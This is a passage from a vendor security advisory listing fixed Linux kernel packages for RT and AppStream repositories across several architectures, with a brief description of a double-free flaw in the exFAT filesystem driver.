| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-rt-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: RT-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
A flaw was found in the Linux kernel's exFAT filesystem driver. A local attacker with low privileges could exploit a double free vulnerability within the `delayed_free` function. This memory corruption flaw can lead to a denial of service (DoS), potentially causing system instability or crashes. It may also result in information disclosure.
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-64k-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-abi-stablelists-0:5.14.0-611.35.1.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debug-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-aarch64-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-ppc64le-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-s390x-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-debuginfo-common-x86_64-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-devel-matched-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-doc-0:5.14.0-611.35.1.el9_7.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-core-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-modules-extra-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-0:5.14.0-611.35.1.el9_7.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debug-modules-extra-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-devel-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: AppStream-9.7.0.Z.MAIN:kernel-rt-64k-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 | — |
Vendor Fix
fix
|
|
